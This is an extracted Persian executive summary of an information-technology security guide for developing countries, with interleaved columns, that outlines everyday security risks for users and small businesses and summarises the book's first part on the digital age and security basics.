‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻭ ﻣﻬﻢ ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻓﺮﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﺧﻄﺮﺍﺗﻲ ﻛـﻪ ﻫﻨﮕـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺍﻳﻨﺘـﺮﻧﺖ ﻣﺘﻮﺟﻪ ﺁﻧﻬﺎ ﺍﺳﺖ ﻣﻄﻠﻊ ﻧﺒﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻄـﺮﺍﺕ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨـﺪ‪ ،‬ﺑـﺎﺯ ﻫـﻢ ﻣﻤﻜـﻦ‬ ‫ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ‬
‫ﺍﺳﺖ ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺩﻳـﻮﺍﺭﻩ ﻫـﺎﻱ ﺁﺗـﺶ‪ ،٢‬ﻭﻳـﺮﻭﺱﻳﺎﺑﻬـﺎ‪،٣‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ٤‬ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﻗﺎﻋـﺪﻩﻣﻨـﺪ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﻪ ﺩﻟﻴـﻞ‬ ‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛـﺎﺭﺑﺮﺩﻱ ﺟﻬـﺖ‬
‫ﻫﺰﻳﻨﻪ ﻭ ﻭﻗﺘﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﮔﻴـﺮﺩ ﻭ ﺗﻐﻴﻴـﺮﻱ ﻛـﻪ ﺩﺭ ﺭﻓﺘـﺎﺭ‬ ‫ﻓﻬﻢ ﻭ ﺍﺟﺮﺍﻱ ﮔﺎﻣﻬﺎﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺣﻮﺯﺓ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻧﻬﺎ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﺑﻪ ﺗﻌﻮﻳﻖ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ‬ ‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻣﺤﻞ ﻛﺎﺭ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﮔﺮﭼـﻪ ﺍﻳـﻦ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻳﻚ ﺭﺍﻩﺣﻞ ﻓﻨـﻲ‬ ‫ﻛﺘﺎﺏ ﺑﻬﺘـﺮﻳﻦ ﻭ ﻧـﻮﻳﻦﺗـﺮﻳﻦ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﺭﺍ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨـﺎﻭﺭﻱ‬
‫ﻧﻈﻴﺮ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ ﻭ ﺑﻪ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺳﻄﻮﺡ ﺍﻣﻨﻴﺖ‬ ‫ﺍﻃﻼﻋــﺎﺕ ﺍﺭﺍﺋــﻪ ﻣــﻲﺩﻫــﺪ‪ ،‬ﺍﻣــﺎ ﺩﺭ ﺍﺻــﻞ ﺑــﺮﺍﻱ ﺧﻮﺍﻧﻨــﺪﮔﺎﻥ‬
‫ﺗﻮﺟﻬﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﻧﺪﺍﻧﻨﺪ ﻛﻪ ﺑﺪﻭﻥ ﺗﻮﺟـﻪ ﺑـﻪ ﺁﻥ‪ ،‬ﺍﻣﻨﻴـﺖ‬ ‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻛﺘـﺎﺏ ﻋـﻼﻭﻩ‬
‫ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﺪﺕ ﺩﭼﺎﺭ ﻣﺨﺎﻃﺮﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﻲ ﻣﻮﺟـﻮﺩ‬‫ﺑﺮ ﺍﺭﺍﺋﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﻓﻴﺰﻳﻜﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ‬
‫ﺑﻪ ﺩﻻﻳﻞ ﻣﺨﺘﻠﻒ ﺍﻳﻤﻦ ﺳﺎﺧﺘﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﺗـﺄﺧﻴﺮ‬ ‫ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺑـﻪ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﻣـﺪﻳﺮﻳﺘﻲ‪،‬‬
‫ﺑﻴﺎﻧﺪﺍﺯﻧﺪ ﻭ ﺩﺭ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻔﺎﻑ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻭ‬ ‫ﻣﺤﻴﻄﻬﺎﻱ ﺿﺎﺑﻄﻪﻣﻨﺪ ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﻣﺸﺎﺭﻛﺖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻫﻤﻜﺎﺭ‬
‫ﻣﺪﻳﺮﺍﻥ ﻧﻴﺰ ﻛﻮﺗﺎﻫﻲ ﻛﻨﻨﺪ‪ .‬ﺍﮔـﺮ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ ،‬ﺁﮔـﺎﻫﻲ ﻭ ﺁﻣـﻮﺯﺵ‬ ‫ﻣﻲﭘﺮﺩﺍﺯﺩ ﻛـﻪ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺑﺎﺯﺍﺭﻫـﺎ‪ ،‬ﺩﻭﻟﺘﻬـﺎ‪ ،‬ﻣﺆﺳـﺴﺎﺕ‬
‫ﻣﻨﺎﺳﺐ ﺩﺭ ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺗﺒﻬﻜﺎﺭﺍﻥ ﻣﻤﻜﻦ ﺍﺳـﺖ‬ ‫ﺣﺮﻓﻪﺍﻱ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﭘﻨﺞ‬
‫ﺑﻪ ﺁﺳﺎﻧﻲ ﺣﻔﺎﻇﻬﺎﻱ ﻓﻨﻲ ﺭﺍ ﭘﺸﺖ ﺳﺮ ﺑﮕﺬﺍﺭﻧﺪ‪.‬‬ ‫ﺑﺨﺶ ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﻛﻪ ﻫﺮﻳﻚ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻣـﺴﺘﻘﻞ ﺍﺯ‬
‫ﺩﻳﮕﺮﻱ ﻣﻄﺎﻟﻌﻪ ﻛﺮﺩ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺘﻐﻴﺮ‪:‬‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴـﺎﺭ‪ ،‬ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻫﺎﻱ ﺭﺍﻳـﺞ ﻛﺎﺭﺑﺮﺩﻱ‪،‬‬ ‫ﺍﻳﻦ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ﻣﻮﺿﻮﻋﺎﺕ ﺍﺻﻠﻲ ﻛﺘﺎﺏ ﺭﺍ ﭘﻮﺷـﺶ ﺩﺍﺩﻩ ﻭ‬
‫ﺩﺭ ﻗﺴﻤﺘﻲ ﺑﺎ ﻋﻨﻮﺍﻥ "ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﮐﺘﺎﺏ" ﺗﺼﻮﻳﺮﻱ ﻛﻠﻲ ﺍﺯ ﻫﺮ‬
‫ﻭ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﻣﻮﺟﺐ ﺍﻳﺠﺎﺩ ﭘﻴﭽﻴﺪﮔﻲ ﻣﻲﺷﻮﻧﺪ‬
‫ﺑﺨﺶ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﺭ ﺣﺎﻝ ﺣﺎﺿﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺪﻳﺪ ﻭ ﻏﻴﺮﻣﺘﺨﺼﺺ ﺗﻨﻬﺎ ﻋﻠﺖ ﻧﻘـﺾ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻴﺴﺘﻨﺪ‪ .‬ﻣﺤـﻴﻂ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬ ‫ﺳﺎﺯﮔﺎﺭﺳﺎﺯﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺎ ﭘﻴﺪﺍﻳﺶ ﻣﺤﺼﻮﻻﺕ ﺟﺪﻳﺪ ﺧـﺼﻮﺻﹰﺎ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ‬ ‫ﺩﺭ ﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‬
‫ﺳــﻴﺎﺭ )ﻣﺎﻧﻨــﺪ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻛﻴﻔــﻲ‪ ،‬ﺗﻠﻔﻨﻬــﺎﻱ ﻫﻤــﺮﺍﻩ ﻭ ‪PDA‬ﻫــﺎ‪ (٥‬ﻛــﻪ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺍﺑﺘﺪﺍ ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﺷﺪ ﺑﺨﺶ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﭼﺎﻟﺸﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺩﺭ ﺯﻳﺮﺳـﺎﺧﺖ ﻭ ﺍﻣﻨﻴـﺖ ﺩﺍﺩﻩﻫـﺎ ﺍﻳﺠـﺎﺩ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ )‪ (ICT‬ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺭﺷﺪ ﻭ ﺍﺭﺗﻘﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ‪ ICT‬ﺭﺍ‬
‫ﻣﻲﻛﻨﻨﺪ ﺑﺴﺮﻋﺖ ﺭﻭ ﺑﻪ ﺗﻐﻴﻴﺮ ﻣﻲﺑﺎﺷـﺪ‪ .‬ﭘﻴـﺪﺍﻳﺶ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺩﺭ ﺑﺮ ﻣﻲ ﮔﻴﺮﺩ ﻭ ﺍﺯ ﺍﻓﺰﺍﻳﺶ ﺗﻌﺪﺍﺩ ﺷﺒﻜﻪﻫـﺎﻱ ﺧـﺎﻧﮕﻲ ﻭ ﺭﺷـﺪ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺗﺠـﺎﺭﺕ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ )‪ - ١(SMEs‬ﻛﻪ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴــﻚ ﻧﻴــﺰ ﻣﻮﺟــﺐ ﺑــﺮﻭﺯ ﭘﻴﭽﻴــﺪﮔﻴﻬﺎﻳﻲ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ‬
‫ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺷﺪﺕ ﺑﻪ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻱ ﻭ ﺑﻜﺎﺭﮔﻴﺮﻱ ﺁﻥ ﺩﺭ‬
‫ﺷﺒﻜﻪﺍﻱ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﻣﺘﻜﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣـﻲﺑﺎﺷـﻨﺪ ‪-‬‬
‫ﺍﺯ ﻫﻨﮕﺎﻡ ﻇﻬﻮﺭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﮔﺮﻓﺘـﻪ ﺗـﺎ ﺯﻣـﺎﻥ ﺭﻭﺍﺝ‬ ‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻥ ﭘﻲ ﺑﺮﺩ‪.‬‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،٦‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻣﻮﺟﺐ ﺻﺮﻓﻪﺟـﻮﻳﻲ ﻣﻨﺎﺳـﺐ‬
‫ﺩﺭ ﻫﺰﻳﻨﻪﻫﺎ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﻩﺍﻱ ﻧﻴـﺰ ﺑـﻪ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺍﺯ ﺳﻮﺍﺑﻖ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ‬
‫ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ‪.‬‬ ‫ﺗﺄﻣﻴـﻦ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻮﺳﻌﺔ ﺑﺎﺯﺍﺭ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺩﻭ‬
‫‪2‬‬ ‫‪Firewall‬‬ ‫ﺳﻄﺢ ﻓﺮﺩﻱ ﻭ ﺳﺎﺯﻣﺎﻧﻲ ﭼﺸﻤــﮕﻴﺮ ﺍﺳﺖ‪ ،‬ﺍﻃﻼﻉ ﺍﺯ ﻣﺒﺎﺣـــﺚ‬
‫‪3‬‬ ‫‪Virus Scanner‬‬
‫‪4‬‬ ‫‪Encryption‬‬
‫‪5‬‬ ‫‪Personal Digital Assistants‬‬
‫‪6‬‬ ‫‪Online Banking‬‬ ‫‪1‬‬ ‫‪Small and Medium Sized Enterprises‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٠‬‬

‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺍﻭﻝ‬ ‫ﺁﻧﭽﻪ ﻛﻪ ﺍﻭﺿﺎﻉ ﺭﺍ ﺑﺪﺗﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻛﻨﻮﻥ ﻧﻔـﻮﺫﮔﺮﺍﻥ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬ ‫ﻗﺎﺩﺭ ﺑﻪ ﺗﻮﺳﻌﻪ ﻭ ﮔـﺴﺘﺮﺵ ﺗﻬﺪﻳـﺪﺍﺕ ﺧـﻮﺩ ﻣـﻲﺑﺎﺷـﻨﺪ‪ :‬ﻣﺜـﻞ‬
‫ﺗﺮﻛﻴﺒــﻲ ﺍﺯ ﻭﻳﺮﻭﺳــﻬﺎ‪ ،٧‬ﻛﺮﻣﻬــﺎ‪ ٨‬ﻭ ﺗﺮﺍﻭﺍﻫــﺎﻳﻲ‪ ٩‬ﻛــﻪ ﻣــﻲﺗﻮﺍﻧــﺪ‬
‫ﺑﺨﺶ ﺍﻭﻝ ﻛﺘﺎﺏ ﻣﻘﺪﻣﻪﺍﻱ ﺑﺮ ﻣﺒﺎﺣـﺚ ﻛﻠـﻲ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻋـﺼﺮ‬
‫ﺁﺳﻴﺒﻬﺎﻱ ﺷﺪﻳﺪﺗﺮﻱ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺩﺍﺩﻩﻫﺎ ﻭﺍﺭﺩ ﻛﻨﺪ‪ .‬ﺍﻳﻦ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﺮﺩﻡ ﺍﺯ ﮔﺬﺷﺘﻪ ﺗﺎ ﻛﻨﻮﻥ ﻫﻤﻴـﺸﻪ ﻧﮕـﺮﺍﻥ‬
‫ﺻــﺪﻣﺎﺕ ﺣﺘــﻲ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺍﺯ ﺑﻌــﻀﻲ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﻣﺨــﺮﺏ‬
‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩﻩﺍﻧﺪ‪ ،‬ﺍﻣﺎ ﺍﺑﺪﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﻭﻧﺪ ﻛﺎﺭ ﺭﺍ‬
‫)ﺑﺪﺍﻓﺰﺍﺭﻫﺎ(‪ ١٠‬ﻧﻴـﺰ ﺧﻄﺮﻧـﺎﻛﺘﺮ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ‬
‫ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﻣﺤﺪﻭﺩﺓ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ‬
‫ﭘﻴﺸﺮﻓﺘﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻧﻲ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗـﺮﺍﺭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﺮﺳﻴﻢ ﻛﺮﺩﻩ ﻭ ﺍﻧﻮﺍﻉ ﻣﺘﻌﺪﺩﻱ ﺍﺯ ﺍﻋﻤـﺎﻝ ﻧﺎﻣﻨﺎﺳـﺐ‬
‫ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﺩﺭ ﻗﺒﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ ﻭ ﺧﻄﺮﺍﺕ ﻛﺎﺭ ﺑﺎ‬
‫ﺗﻨﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺣﺎﺻﻞ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺁﻧﻬﺎ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﺨﺶ ﺍﻭﻝ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬ ‫ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﺍﻣﻨﻴﺖ ﺩﺭ‬
‫• ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ‬ ‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫• ﺗﻌﺮﻳﻒ ﺍﻣﻨﻴﺖ‬ ‫ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ‬
‫• ﭘﻴﺪﺍﻳﺶ ﻭ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﺍﻫﻤﻴﺖ ﺷـﺎﻳﺎﻧﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ‪ .‬ﻭﺍﺿـﺢ ﺍﺳـﺖ ﻛـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫• ﻛﻠﻴﺎﺕ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ‬
‫ﻓﺮﺻﺘﻬﺎﻳﻲ ﻃﻼﻳﻲ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓـﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﻛـﻪ‬
‫• ﻣﻬﺎﺟﻤﻴﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺣﺪﻭﺩ ﺩﻩ ﺳﺎﻝ ﻗﺒﻞ ﺣﺘﻲ ﺗﺼﻮﺭ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﺑﻮﺩ‪ .‬ﺍﻟﺒﺘﻪ ﺩﺳﺘﺮﺳﻲ‬
‫ﺁﮔﺎﻫﻲ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻧﻨﺪ ﻭﺟﻮﺩ‬ ‫ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻫﻤﻴﺸﻪ ﻫﻢ ﺍﺭﺯﺍﻥ ﻧﻴﺴﺖ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻗـﺎﺩﺭ‬
‫ﻭ ﮔﺴﺘﺮﺵ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺧـﺎﺹ‪ ،‬ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ‪ ،‬ﻣـﺪﻳﺮﺍﻥ ﻭ‬ ‫ﻣﻲﺳﺎﺯﺩ ﺗﺎ ﻧﮕﺎﻫﻲ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣﻮﺿـﻮﻋﺎﺕ ﺩﺍﺷـﺘﻪ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻛﻤـﻚ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ ﺗـﺎ ﺑـﺮﺍﻱ ﺗﻘﻮﻳـﺖ ﺍﻳﻤﻨـﻲ‬ ‫ﺑﺎﺷــﻨﺪ ﻭ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺍﺭﺗﺒــﺎﻁ ﻣــﺮﺩﻡ ﺍﺯ ﻃﺮﻳــﻖ ﭘــﺴﺖ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺧـﻮﺩ ﺩﺭ ﻣﻨـﺰﻝ ﻭ ﻳـﺎ ﻣﺤـﻞ ﻛـﺎﺭ ﺩﺭ ﻣﻘﺎﺑـﻞ ﻧﻘـﺾ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﻴﺎﺭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺍﺯ ﺧﺪﻣﺎﺕ ﭘﺴﺘﻲ ﺳﻨﺘﻲ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺣﺮﻳﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﺆﺛﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺻﻮﻝ ﺗﺠﺎﺭﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﺗـﺄﺛﻴﺮ ﮔﺬﺍﺷـﺘﻪ ﺍﺳـﺖ؛‬
‫ﺑﺎﺯﺍﺭﻫﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻛﻨﻮﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻛﺎﻻﻫـﺎﻱ‬
‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺩﻭﻡ‬ ‫ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ‪ ١١‬ﺑﻔﺮﻭﺷﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻫﻨـﻮﺯ ﺗﻌـﺪﺍﺩ ﺭﻗﺒـﺎ ﺩﺭ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬ ‫ﺑﺎﺯﺍﺭ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺎﺩﮔﻲ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎ‬
